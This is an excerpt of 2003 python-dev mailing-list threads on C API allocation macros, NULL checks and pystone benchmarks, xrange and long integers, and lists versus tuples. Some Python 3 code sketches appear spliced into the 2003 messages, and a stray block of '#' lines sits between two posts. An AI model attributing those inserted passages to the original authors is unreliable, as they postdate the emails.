In-Reply-To: <7kb4z7jk.fsf@python.net> (Thomas Heller's message of "12 Mar
 2003 20:52:47 +0100")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net>
Message-ID: <uvfyn4fjj.fsf@boost-consulting.com>

Thomas Heller <theller@python.net> writes:

>> I don't think the macro versions should ever be used outside the core.
>> Inside the core, it's safe.  So I think the "doc bug" is that the docs
>> mention PyObject_NEW at all.
>>
>
> Better to explicitly warn about them with a wording similar to that
> from the section 9.2 Memory Interface:
>
>   In addition, the following macro sets are provided for calling the
>   Python memory allocator directly, without involving the C API
>   functions listed above. However, note that their use does not preserve
>   binary compatibility across Python versions [] and is therefore
>   deprecated in extension modules.
>
> Maybe 'and compilers' should be inserted between the [].

I'm not in a position to decide which one of these is better.  Thomas,
maybe you should be submitting the patch?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Thu Mar 13 12:26:35 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 07:26:35 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "13 Mar 2003 08:46:13 +0100")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
 <u65qo5j0v.fsf@boost-consulting.com>
 <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de>
Message-ID: <uy93j4flw.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. Löwis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> > No. You also cannot pass struct FILE* from one C library to the other;
>> > file locking will then crash.
>>
>> A file is a resource.
>
> Yes, but printf is neither allocation nor deallocation.

fprintf, but point taken.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From theller@python.net  Thu Mar 13 12:39:28 2003
From: theller@python.net (Thomas Heller)
Date: 13 Mar 2003 13:39:28 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyn4fjj.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net> <uvfyn4fjj.fsf@boost-consulting.com>
Message-ID: <8yvjqw3j.fsf@python.net>

David Abrahams <dave@boost-consulting.com> writes:

> Thomas Heller <theller@python.net> writes:
> 
> >> I don't think the macro versions should ever be used outside the core.
> >> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> >> mention PyObject_NEW at all.
> >> 
> >
> > Better to explicitly warn about them with a wording similar to that
> > from the section 9.2 Memory Interface:
> 
> I'm not in a position to decide which one of these is better.  Thomas,
> maybe you should be submitting the patch?

Nor am I. You can submit a patch as well, and the discussion will show.

Sorry, no time.

Thomas


From dave@boost-consulting.com  Thu Mar 13 13:00:24 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 08:00:24 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <8yvjqw3j.fsf@python.net> (Thomas Heller's message of "13 Mar
 2003 13:39:28 +0100")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net> <uvfyn4fjj.fsf@boost-consulting.com>
 <8yvjqw3j.fsf@python.net>
Message-ID: <uhea74e1j.fsf@boost-consulting.com>

Thomas Heller <theller@python.net> writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Thomas Heller <theller@python.net> writes:
>>
>> >> I don't think the macro versions should ever be used outside the core.
>> >> Inside the core, it's safe.  So I think the "doc bug" is that the docs
>> >> mention PyObject_NEW at all.
>> >>
>> >
>> > Better to explicitly warn about them with a wording similar to that
>> > from the section 9.2 Memory Interface:
>>
>> I'm not in a position to decide which one of these is better.  Thomas,
>> maybe you should be submitting the patch?
>
> Nor am I. You can submit a patch as well, and the discussion will show.
>
> Sorry, no time.

Fair enough; Tim's patch was much easier ;-)

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From fuf@mageo.cz  Thu Mar 13 13:36:09 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 14:36:09 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
Message-ID: <20030313133609.GA23223@foof.i3.cz>

[this was sent to python-list, but i'm re-posting here as told by Skip]

 hello,

 i had a quick look at Objects/abstract.c in 2.2.2's source. almost
 every function there checks whether the objects it's passed are not
 NULL. if they are, SystemError exception occurs. since i've never come
 across such exception i've commented out those checks.

 the resulting python binary did 6.5% more pystones on average (the
 numbers are below). my question is: are those checks really necessary
 in non-debug python build?

 the pystone results:

 BEFORE:

$ for (( i = 0; i <= 5; i++ )); do ./pystone.py; done
Pystone(1.1) time for 10000 passes = 0.6
This machine benchmarks at 16666.7 pystones/second
Pystone(1.1) time for 10000 passes = 0.56
This machine benchmarks at 17857.1 pystones/second
Pystone(1.1) time for 10000 passes = 0.58
This machine benchmarks at 17241.4 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second

 AFTER:

$ for (( i = 0; i <= 5; i++ )); do ./pystone.py; done
Pystone(1.1) time for 10000 passes = 0.54
This machine benchmarks at 18518.5 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second
Pystone(1.1) time for 10000 passes = 0.55
This machine benchmarks at 18181.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.52
This machine benchmarks at 19230.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.52
This machine benchmarks at 19230.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.54

-- 
		fuf		(fuf@mageo.cz)


From mwh@python.net  Thu Mar 13 13:45:45 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 13:45:45 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <20030313133609.GA23223@foof.i3.cz> (Michal Vitecek's message
 of "Thu, 13 Mar 2003 14:36:09 +0100")
References: <20030313133609.GA23223@foof.i3.cz>
Message-ID: <2msmtre5x2.fsf@starship.python.net>

Michal Vitecek <fuf@mageo.cz> writes:

>  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
>  every function there checks whether the objects it's passed are not
>  NULL. if they are, SystemError exception occurs. since i've never come
>  across such exception i've commented out those checks.

There are a number of bits of stupidly defensive programming in
Python... personally, I'd like to see the back of them.

>  the resulting python binary did 6.5% more pystones on average (the
>  numbers are below).

Wow!  Can we persuade you to try CVS HEAD?

>  my question is: are those checks really necessary
>  in non-debug python build?

This is the tricky bit, of course.  I don't think so, but it's hard to
be sure.

OTOH, it could be the easiest 5% speed up ever...

Cheers,
M.

-- 
  This makes it possible to pass complex object hierarchies to
  a C coder who thinks computer science has made no worthwhile
  advancements since the invention of the pointer.
                                       -- Gordon McMillan, 30 Jul 1998


From mwh@python.net  Thu Mar 13 14:06:56 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 14:06:56 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <2msmtre5x2.fsf@starship.python.net> (Michael Hudson's message
 of "Thu, 13 Mar 2003 13:45:45 +0000")
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
Message-ID: <2mptove4xr.fsf@starship.python.net>

Michael Hudson <mwh@python.net> writes:

>>  the resulting python binary did 6.5% more pystones on average (the
>>  numbers are below).
>
> Wow!  Can we persuade you to try CVS HEAD?

Actually, I've now tried it, and saw a pystone increase of more like
0.1%.  Are you sure the abstract.c changes are the only difference
between the two binaries?

Cheers,
M.

-- 
  I've reinvented the idea of variables and types as in a
  programming language, something I do on every project.
                                          -- Greg Ward, September 1998


From fuf@mageo.cz  Thu Mar 13 14:18:58 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 15:18:58 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <2msmtre5x2.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz> <2msmtre5x2.fsf@starship.python.net>
Message-ID: <20030313141858.GB23223@foof.i3.cz>

Michael Hudson wrote:
>Wow!  Can we persuade you to try CVS HEAD?

 okay - i did as you said and the speed-up is only 2.1% so it's
 probably not worth it. here come the numbers:

 BEFORE:

$ for (( i = 0; i <= 5; i++ )); do ./python Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 1.97
This machine benchmarks at 25380.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.92
This machine benchmarks at 26041.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second
Pystone(1.1) time for 50000 passes = 1.97
This machine benchmarks at 25380.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second

 AFTER:

$ for (( i = 0; i <= 5; i++ )); do ./python Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 1.95
This machine benchmarks at 25641 pystones/second
Pystone(1.1) time for 50000 passes = 1.93
This machine benchmarks at 25906.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.91
This machine benchmarks at 26178 pystones/second
Pystone(1.1) time for 50000 passes = 1.92
This machine benchmarks at 26041.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.89
This machine benchmarks at 26455 pystones/second
Pystone(1.1) time for 50000 passes = 1.89
This machine benchmarks at 26455 pystones/second

-- 
		fuf		(fuf@mageo.cz)


From guido@python.org  Thu Mar 13 14:29:38 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 09:29:38 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: Your message of "Thu, 13 Mar 2003 14:36:09 +0100."
 <20030313133609.GA23223@foof.i3.cz>
References: <20030313133609.GA23223@foof.i3.cz>
Message-ID: <200303131429.h2DETem03635@odiug.zope.com>

>  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
>  every function there checks whether the objects it's passed are not
>  NULL. if they are, SystemError exception occurs. since i've never come
>  across such exception i've commented out those checks.
> 
>  the resulting python binary did 6.5% more pystones on average (the
>  numbers are below). my question is: are those checks really necessary
>  in non-debug python build?

Unfortunately, this is part of the safety net for poor extension
writers, and I'm not sure we can drop it.

Given that Pystone is so regular, it's probably just one or two of the
functions you changed that make the difference.  If you can figure out
which ones, perhaps you could inline just those (in the switch in
ceval.c) and get the same effect.

Anyway, I only get a 1% speedup.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Thu Mar 13 14:33:21 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 14:33:21 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <20030313141858.GB23223@foof.i3.cz> (Michal Vitecek's message
 of "Thu, 13 Mar 2003 15:18:58 +0100")
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
 <20030313141858.GB23223@foof.i3.cz>
Message-ID: <2mn0jze3pq.fsf@starship.python.net>

Michal Vitecek <fuf@mageo.cz> writes:

> Michael Hudson wrote:
>>Wow!  Can we persuade you to try CVS HEAD?
>
>  okay - i did as you said and the speed-up is only 2.1% so it's
>  probably not worth it. here come the numbers:

I didn't say "*two* point one", I said "*nought* point one"!:

  BEFORE:

$ for i in 1 2 3 4 5; do ./python- ../Lib/test/pystone.py; done 
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.37
This machine benchmarks at 14836.8 pystones/second
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second

  AFTER:

$ for i in 1 2 3 4 5; do ./python ../Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.4
This machine benchmarks at 14705.9 pystones/second

If it was a 2% gain, I'd say go for it (though Guido isn't so sure, it
seems).

What compiler/platform are you using?

Cheers,
M.

-- 
  languages shape the way we think, or don't.
                                        -- Erik Naggum, comp.lang.lisp


From skip@pobox.com  Thu Mar 13 14:42:26 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 08:42:26 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <2mn0jze3pq.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
 <20030313141858.GB23223@foof.i3.cz>
 <2mn0jze3pq.fsf@starship.python.net>
Message-ID: <15984.39122.349303.287830@montanaro.dyndns.org>

Michal,

Can you post your changes to abstract.c as a patch on SourceForge?  That
would allow multiple people to mull it over and all be sure they are working
from the same code base.  If Michael Hudson and Guido reported substantially
different speedups than you, perhaps you were doing something they weren't.

Skip


From fuf@mageo.cz  Thu Mar 13 15:09:05 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 16:09:05 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <2mn0jze3pq.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz> <2msmtre5x2.fsf@starship.python.net> <20030313141858.GB23223@foof.i3.cz> <2mn0jze3pq.fsf@starship.python.net>
Message-ID: <20030313150905.GC23223@foof.i3.cz>

Michael Hudson wrote:
>>  okay - i did as you said and the speed-up is only 2.1% so it's
>>  probably not worth it. here come the numbers:
>
>I didn't say "*two* point one", I said "*nought* point one"!:

 crap. i found the problem - on a _completely unused_ computer the
 difference is indeed only ~0.7%. my apologies for false alarm :/

        sorry,
-- 
		fuf		(fuf@mageo.cz)


From dave@boost-consulting.com  Thu Mar 13 16:27:07 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 11:27:07 -0500
Subject: [Python-Dev] More int/long integration issues
Message-ID: <ur89b1bc4.fsf@boost-consulting.com>

I was recently surprised by:

    Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
    [GCC 3.2 20020927 (prerelease)] on cygwin
    Type "help", "copyright", "credits" or "license" for more information.
    >>> xrange(2 ** 32)
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
    OverflowError: long int too large to convert to int

Now that we have a kind of long/int integration, maybe it makes sense
to update xrange()?  Or is that really a 2.4 feature?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From mal@lemburg.com  Thu Mar 13 16:30:09 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 13 Mar 2003 17:30:09 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <20030313150905.GC23223@foof.i3.cz>
References: <20030313133609.GA23223@foof.i3.cz>	<2msmtre5x2.fsf@starship.python.net> <20030313141858.GB23223@foof.i3.cz>	<2mn0jze3pq.fsf@starship.python.net> <20030313150905.GC23223@foof.i3.cz>
Message-ID: <3E70B211.4030600@lemburg.com>

Michal Vitecek wrote:
> Michael Hudson wrote:
> 
>>> okay - i did as you said and the speed-up is only 2.1% so it's
>>> probably not worth it. here come the numbers:
>>
>>I didn't say "*two* point one", I said "*nought* point one"!:
> 
>  crap. i found the problem - on a _completely unused_ computer the
>  difference is indeed only ~0.7%. my apologies for false alarm :/

I'd rather suggest taking a look at making more use of
the available Python macros in the interpreter.

Things like PyInt_AsLong() can often be written as PyInt_AS_LONG()
because there's a type check only a few lines above the call.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 13 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     19 days left
EuroPython 2003, Charleroi, Belgium:                       103 days left


From aahz@pythoncraft.com  Thu Mar 13 16:42:47 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 13 Mar 2003 11:42:47 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <ur89b1bc4.fsf@boost-consulting.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
Message-ID: <20030313164247.GB22296@panix.com>

On Thu, Mar 13, 2003, David Abrahams wrote:
> 
> I was recently surprised by:
> 
>     Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
>     [GCC 3.2 20020927 (prerelease)] on cygwin
>     Type "help", "copyright", "credits" or "license" for more information.
>     >>> xrange(2 ** 32)
>     Traceback (most recent call last):
>       File "<stdin>", line 1, in ?
>     OverflowError: long int too large to convert to int
> 
> Now that we have a kind of long/int integration, maybe it makes sense
> to update xrange()?  Or is that really a 2.4 feature?

IIRC, it was decided that doing that wouldn't make sense until the
standard sequences (lists/tuples) can support more than 2**31 items.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From guido@python.org  Thu Mar 13 17:24:33 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 12:24:33 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: Your message of "Thu, 13 Mar 2003 11:27:07 EST."
 <ur89b1bc4.fsf@boost-consulting.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
Message-ID: <200303131724.h2DHOZS05548@odiug.zope.com>

> Now that we have a kind of long/int integration, maybe it makes sense
> to update xrange()?  Or is that really a 2.4 feature?

IMO, xrange() must die.

As a compromise to practicality, it should lose functionality, not
gain any.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Thu Mar 13 17:31:08 2003
From: mcherm@mcherm.com (Chermside, Michael)
Date: Thu, 13 Mar 2003 12:31:08 -0500
Subject: [Python-Dev] Re: More int/long integration issues
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>

Guido writes:
> IMO, xrange() must die.

Glad to hear it. I always found range() vs xrange() a wart.

But if you had it to do over, how would you do it?

-- Michael Chermside


From dave@boost-consulting.com  Thu Mar 13 17:43:04 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 12:43:04 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303131724.h2DHOZS05548@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 13 Mar 2003 12:24:33 -0500")
References: <ur89b1bc4.fsf@boost-consulting.com>
 <200303131724.h2DHOZS05548@odiug.zope.com>
Message-ID: <u8yvj17tj.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> IMO, xrange() must die.
>
> As a compromise to practicality, it should lose functionality, not
> gain any.

OK, range() becomes lazy, then?  Or is there another plan?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Thu Mar 13 19:03:27 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 14:03:27 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: Your message of "Thu, 13 Mar 2003 12:31:08 EST."
 <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
Message-ID: <200303131903.h2DJ3Ug06240@odiug.zope.com>

> Guido writes:
> > IMO, xrange() must die.
> >
> > As a compromise to practicality, it should lose functionality, not
> > gain any.

[Michael Chermside]
> Glad to hear it. I always found range() vs xrange() a wart.

It is, and it is one that I hate.

> But if you had it to do over, how would you do it?

I'd make range() an iterator.  To get a concrete list that you can
modify, you'd have to write list(range(N)).  But that can't be done 
without breaking backwards compatibility, so I won't.
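
A minimal sketch of the idea in the paragraph above, assuming a modern
Python 3 interpreter (which postdates this thread). The name lazy_range
is hypothetical and stands in for "range() as an iterator"; a concrete,
modifiable list is obtained only by asking for one explicitly.

```python
def lazy_range(start, stop=None, step=1):
    """Hypothetical generator yielding ints on demand, never building a list."""
    if stop is None:
        start, stop = 0, start
    if step == 0:
        raise ValueError("step must not be zero")
    i = start
    while (step > 0 and i < stop) or (step < 0 and i > stop):
        yield i
        i += step


# Iterating needs no list of indices at all.
squares = [i * i for i in lazy_range(5)]

# A concrete list is requested explicitly when mutation is needed.
concrete = list(lazy_range(3))
concrete.append(99)
```

The generator keeps only the current value, so memory use does not
depend on the length of the range.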

[David Abrahams]
> OK, range() becomes lazy, then?  Or is there another plan?

The bytecode compiler should be clever enough to see that you're
writing

  for i in range(...): ...

and that there's no definition of range other than the built-in one
(this requires a subtle change of language rules); it can then
substitute an internal equivalent to xrange().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Thu Mar 13 19:15:09 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 13 Mar 2003 14:15:09 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
References: <20030313133609.GA23223@foof.i3.cz>  <200303131429.h2DETem03635@odiug.zope.com>
Message-ID: <007d01c2e994$ddb73c00$3c10a044@oemcomputer>

> >  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
> >  every function there checks whether the objects it's passed are not
> >  NULL. if they are, SystemError exception occurs. since i've never come
> >  across such exception i've commented out those checks.

> Unfortunately, this is part of the safety net for poor extension
> writers, and I'm not sure we can drop it.

Can we get most of the same benefit by using 
an assert() rather than NULL-->SystemError?


Raymond Hettinger


From jeremy@zope.com  Thu Mar 13 20:01:03 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 Mar 2003 15:01:03 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
Message-ID: <1047585663.4296.2.camel@slothrop.zope.com>

On Thu, 2003-03-13 at 14:15, Raymond Hettinger wrote:
> > >  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
> > >  every function there checks whether the objects it's passed are not
> > >  NULL. if they are, SystemError exception occurs. since i've never come
> > >  across such exception i've commented out those checks.
> 
> > Unfortunately, this is part of the safety net for poor extension
> > writers, and I'm not sure we can drop it.
> 
> Can we get most of the same benefit by using 
> an assert() rather than NULL-->SystemError?

No.  assert() causes the program to fail.  SystemError() raises an
exception and lets the program keep going.  Those are vastly different
effects.

Jeremy


From python@rcn.com  Thu Mar 13 20:16:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 13 Mar 2003 15:16:03 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
References: <20030313133609.GA23223@foof.i3.cz> <200303131429.h2DETem03635@odiug.zope.com> <007d01c2e994$ddb73c00$3c10a044@oemcomputer> <1047585663.4296.2.camel@slothrop.zope.com>
Message-ID: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>

> > Can we get most of the same benefit by using 
> > an assert() rather than NULL-->SystemError?
> 
> No.  assert() causes the program to fail.  SystemError() raises an
> exception and lets the program keep going.  Those are vastly different
> effects.

Of course.  My thought was that either one will come to the
attention of the extension writer before the extension goes out.
But then, if the code in question never got exercised, then it
would crash in the hands of a user.


Raymond Hettinger

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From python-kbutler@sabaydi.com  Thu Mar 13 20:09:01 2003
From: python-kbutler@sabaydi.com (Kevin J. Butler)
Date: Thu, 13 Mar 2003 13:09:01 -0700
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <20030312164902.10494.64514.Mailman@mail.python.org>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
Message-ID: <3E70E55D.1050102@sabaydi.com>

> *Guido van Rossum * guido@python.org <mailto:guido%40python.org>
> //
>
>Tuples are for heterogeneous data, lists are for homogeneous data.
>
Only if you include *both* null cases:

- tuple of type( i ) == type( i+1 )
- list of PyObject

Homo-/heterogeneity is orthogonal to the primary benefits of lists 
(mutability) and of tuples (fixed order/length). 

Else why can you do list( (1, "two", 3.0) )  and  tuple( [x, y, z] ) ?

>Tuples are *not* read-only lists.
>
It just happens that "tuple( sequence )" is the most easy & obvious (and 
thus right?) way to spell "immutable sequence".

Stop reading whenever you're convinced. ;-)    (not about mutability, 
but about homo/heterogeneity)

There are three (mostly) independent characteristics of tuples (in most 
to least important order, by frequency of use, IMO):

- fixed order/fixed length - used in function argument/return tuples and 
all uses as a "struct"
- heterogeneity allowed but not required - used in many function 
argument tuples and many "struct" tuples
- immutability - implies fixed-order and fixed-length, and used 
occasionally for specific needs

The important characteristics of lists are also independent of each 
other (again, IMO on the order):

- mutability of length & content - used for dynamically building collections
- heterogeneity allowed but not required - used occasionally for 
specific needs

It turns out that fixed-length sequences are often useful for 
heterogeneous data, and that most sequences that require mutability are 
homogeneous.

Examples from the standard library (found by  grep '= (' and grep '= \[' ):

    # homogeneous tuple - homogeneity, fixed order, and fixed length are
    # all required
    # CVS says Guido wrote/imported this.  ;-)
    whrandom.py:        self._seed = (x or 1, y or 1, z or 1)

    # homogeneous tuple - homogeneity is required - all entries must be
    # 'types'
    # suitable for passing to 'isinstance( A, typesTuple )', which
    # (needlessly?) requires a tuple to avoid
    # possibly recursive general sequences
    types.py:    StringTypes = (StringType, UnicodeType)

    # heterogeneous list of values of all basic types (we need to be
    # able to copy all types of values)
    # this could be a tuple, but neither immutability, nor fixed length,
    # nor fixed order are needed, so it makes more sense as a list
    # CVS blames Guido here, too, in version 1.1.  ;-)
    copy.py:    l = [None, 1, 2L, 3.14, 'xyzzy', (1, 2L), [3.14, 'abc'],
                     {'abc': 'ABC'}, (), [], {}]

Other homogeneous tuples (may benefit from mutability, but require 
fixed-length/order):
- 3D coordinates
- RGB color
- binary tree node (child, next)

Other heterogeneous lists (homogeneous lists of base-class instances 
blah-blah-blah):
- files AND directories to traverse (strings? "File" objects?)
- emails AND faxes AND voicemails AND tasks in your Inbox (items?)
- mail AND newsgroup accounts (accounts?)
- return values OR exceptions from a list of test cases and test suites 
(PyObjects? introduce an artificial base class?)
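
The characteristics listed above can be sketched as follows, assuming a
Python 3 interpreter. The variable names are illustrative only and do
not come from the standard library examples quoted earlier.

```python
# Fixed-length, heterogeneous "struct" use of a tuple: position carries meaning.
record = ("guido", 1991, 3.14)
name, year, ratio = record

# Homogeneous tuple: every entry is a type, in the form isinstance() accepts.
number_types = (int, float)
checks = [isinstance(v, number_types) for v in (1, 2.5, "three")]

# Conversions work regardless of what the elements are.
as_list = list((1, "two", 3.0))
as_list.append(None)              # lists can grow in place
as_tuple = tuple(as_list)         # an immutable snapshot of the same items

# A tuple of hashable items can serve as a dictionary key; a list cannot.
lookup = {as_tuple: "frozen snapshot"}
```

Neither container enforces homogeneity; the choice here follows from
whether the length and order are fixed and whether mutation is needed.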

Must-be-stubborn-if-you-got-this-far-ly y'rs  ;-)

kb


From cnetzer@mail.arc.nasa.gov  Thu Mar 13 20:25:17 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 13 Mar 2003 12:25:17 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <20030313164247.GB22296@panix.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
Message-ID: <1047587117.660.33.camel@sayge.arc.nasa.gov>

On Thu, 2003-03-13 at 08:42, Aahz wrote:
> On Thu, Mar 13, 2003, David Abrahams wrote:

> > Now that we have a kind of long/int integration, maybe it makes sense
> > to update xrange()?  Or is that really a 2.4 feature?
> 
> IIRC, it was decided that doing that wouldn't make sense until the
> standard sequences (lists/tuples) can support more than 2**31 items.

I'm working on a patch that allows both range() and xrange() to work
with large (PyLong) values.  Currently, with my patch, the length of
range is still limited to a C long (due to memory issues anyway), and
xrange() could support longer sequences (conceptually), although
indexing them still is limited to C int indices.

I noticed the need for at least supporting long values when I found some
bugs in code that did things like:

a = 1/1e-5
range( a-20, a)

or

a = 1/1e-6
b = 1/1e-5
c = 1/1e-4
range(a, b, c)

Now, this example is hardcoded, but in graphing software, or other
numerical work, the actual values come from the data set.  All of a
sudden, you could be dealing with very small numbers (say, because you
want to examine error values), and you get:

a = 1/1e-21
b = 1/1e-20
c = 1/1e-19
range(a, b, c)

And your piece of code now fails.  By the comments I've seen, this
failure tends to come as a big surprise (people are simply expecting
range to be able to work with PyLong values, over short lengths).

Also, someone who is working with large files (> C long on his machine)
claimed to be having problems w/ xrange() failing (although, if he is
indexing the xrange object, my patch can't help anyway)

I've seen enough people asking in the newsgroups about this behavior (at
least four in the past 5 months or so), and I've submitted some
application patches to make things work for these cases (ie. by
explicitly subtracting out the large common base of each parameter, and
adding it back in after the list is generated), so I decided to make a
patch to change the range behavior.
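
The workaround described above (subtract the large common base, build
the list from small offsets, add the base back) might look like the
sketch below. It assumes integer arguments; range_with_base is a
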